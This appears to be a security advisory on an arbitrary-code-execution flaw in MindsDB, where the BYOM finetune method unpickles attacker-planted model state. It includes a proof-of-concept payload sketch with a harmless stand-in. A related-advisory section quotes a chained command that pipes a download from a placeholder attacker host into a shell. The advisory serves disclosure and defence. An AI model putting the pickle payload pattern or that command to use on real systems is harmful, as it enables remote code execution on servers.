Pickle Load on inhouse BYOM model finetune leads to arbitrary code execution
September 12, 2024

Products Impacted
This vulnerability is present in MindsDB versions v23.10.2.0 or newer.
CVSS Score: 7.1
AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data
Details
To exploit this vulnerability, an attacker authenticated to a MindsDB instance can create a Python script that trains a model on a dataset and makes predictions. Within the script, the attacker can define a class that plants a malicious pickle object inside the method used to train the model. The attacker can then use the ‘Upload Custom Model’ feature in the MindsDB UI to upload this Python script, along with a requirements.txt file listing any libraries required to successfully achieve the exploit. Finally, they can upload the relevant dataset as a file and run the appropriate SQL query to train the model with it and the uploaded script.
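A minimal sketch of what such an uploaded script could look like follows. The class and method names (MyModel, Payload) are illustrative, not taken from a real exploit; the BYOM interface expects train and predict methods, and the payload here uses a harmless print as a stand-in for attacker code such as os.system:

```python
import pickle

class Payload:
    # __reduce__ tells pickle to invoke the returned callable on unpickling.
    # A real attacker would use os.system or similar; print is a harmless stand-in.
    def __reduce__(self):
        return (print, ("arbitrary code executed",))

class MyModel:
    def train(self, df, args=None):
        # Legitimate-looking training logic would go here. The attacker also
        # plants the payload as instance state, so it gets serialized when the
        # server calls pickle.dumps on the model's __dict__.
        self.trained = True
        self.payload = Payload()

    def predict(self, df):
        return df
```

Anything stored on the model instance, including the payload, ends up inside the serialized model state that the server later deserializes.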
When the model is trained, it is serialized along with the malicious pickle object via the call to pickle.dumps in the train method of the ModelWrapperUnsafe class in the mindsdb/integrations/handlers/byom_handler/byom_handler.py file. This class is used when the BYOM engine is set to ‘inhouse’. A finetune query can subsequently be run on the model. When that query executes, control passes to the vulnerable finetune method of the same class, which calls pickle.loads on the stored model state, as shown below:
def finetune(self, df, model_state, args):
    self.model_instance.__dict__ = pickle.loads(model_state)
    call_args = [df]
    if args:
        call_args.append(args)
    self.model_instance.finetune(df, args)
    return pickle.dumps(self.model_instance.__dict__, protocol=5)
This leads to the malicious pickle object being deserialized and any arbitrary code contained within it being executed on the server.
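The danger of calling pickle.loads on attacker-influenced bytes can be reproduced with a self-contained sketch (the names Marker, run_payload, and Evil are illustrative, not MindsDB code). Deserialization alone is enough to invoke the attacker's callable:

```python
import pickle

class Marker:
    executed = False

def run_payload():
    # Stand-in for attacker code; a real payload could run any command.
    Marker.executed = True
    return {}

class Evil:
    def __reduce__(self):
        return (run_payload, ())

# What the server effectively stores after training: serialized model state
# containing the attacker's object.
model_state = pickle.dumps({"weights": [1, 2, 3], "extra": Evil()})

# What finetune does: deserialize that state. The payload runs here,
# before any application logic ever inspects the result.
state = pickle.loads(model_state)
assert Marker.executed
```

Note that the code executes during pickle.loads itself; no method on the restored object needs to be called.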
Related SAI Security Advisories
February 26, 2026
Flair Vulnerability Report
An arbitrary code execution vulnerability exists in the LanguageModel class due to unsafe deserialization in the load_language_model method. Specifically, the method invokes torch.load() with the weights_only parameter set to False, which causes PyTorch to rely on Python’s pickle module for object deserialization.
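The weights_only=True mode that mitigates this class of issue works by restricting which globals the unpickler may resolve. The same idea can be sketched with the standard library's pickle.Unpickler by overriding find_class, as the pickle documentation recommends; this is an analogue of the mitigation concept, not Flair's actual fix:

```python
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    # Allow only a small set of safe builtins; reject everything else.
    ALLOWED = {("builtins", "list"), ("builtins", "dict"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked: {module}.{name}")

class Evil:
    def __reduce__(self):
        # Tries to make the unpickler resolve and call builtins.eval.
        return (eval, ("1+1",))

blob = pickle.dumps(Evil())
try:
    RestrictedUnpickler(io.BytesIO(blob)).load()
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

Plain data structures still round-trip through the restricted unpickler, while any attempt to resolve a disallowed callable fails before execution.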
November 26, 2025
Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode
When in autorun mode, Cursor checks commands sent to run in the terminal against an allowlist of explicitly permitted commands. The function that performs this check contains a logic flaw, allowing an attacker to craft a command that executes non-allowed commands.
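The general class of flaw can be illustrated with a hypothetical allowlist check (this is not Cursor's actual code): a validator that inspects only the leading token of a command string can be bypassed by chaining a forbidden command behind an allowed one with shell operators.

```python
import re

ALLOWED = {"ls", "git", "echo"}

def naive_is_allowed(command: str) -> bool:
    # Flawed: validates only the first word, so anything chained after a
    # shell operator (;, |, &&, ...) rides along unchecked.
    return command.split()[0] in ALLOWED

def stricter_is_allowed(command: str) -> bool:
    # Reject shell control operators outright before consulting the allowlist.
    if re.search(r"[;&|`$(){}<>\n]", command):
        return False
    tokens = command.split()
    return bool(tokens) and tokens[0] in ALLOWED
```

The naive check accepts a string like "echo hi; curl attacker.example | sh" because its first token is allowlisted, while the stricter variant rejects it for containing control operators.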